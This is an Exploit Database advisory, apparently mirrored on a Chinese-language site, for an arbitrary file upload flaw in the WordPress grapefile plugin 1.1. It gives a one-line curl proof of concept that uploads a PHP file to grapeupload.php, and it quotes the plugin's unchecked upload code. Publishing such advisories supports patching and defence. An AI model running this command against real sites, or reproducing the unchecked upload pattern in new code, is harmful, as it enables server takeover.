WordPress Plugin grapefile 1.1 – Arbitrary File Upload

• Exploit Database
• 35 阅读

• 作者： Hrvoje Spoljar
  日期： 2011-08-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17760/

• Title: WordPress grapefile plugin <= 1.1 Arbitrary file upload
  Date: 30-8-2011
  Author: Hrvoje Spoljar [ hrvoje.spoljar(at)gmail.com ]
  Version: 1.1
  Software link:http://wordpress.org/extend/plugins/grapefile/
  
  PoC:
  curl -F "userfile=@mycode.php"
  http://domain.tld/wp-content/plugins/grapefile/grapeupload.php
  
  File(s): grapeupload.phpgrapeupload2.phpgrapeupload3.php
  grapeupload4.php
  Vulnerable code:
  $uploaddir =
  $_SERVER["DOCUMENT_ROOT"].'/wp-content/plugins/grapefile/filestore/avi/';
  $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
  
  if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
  echo "success";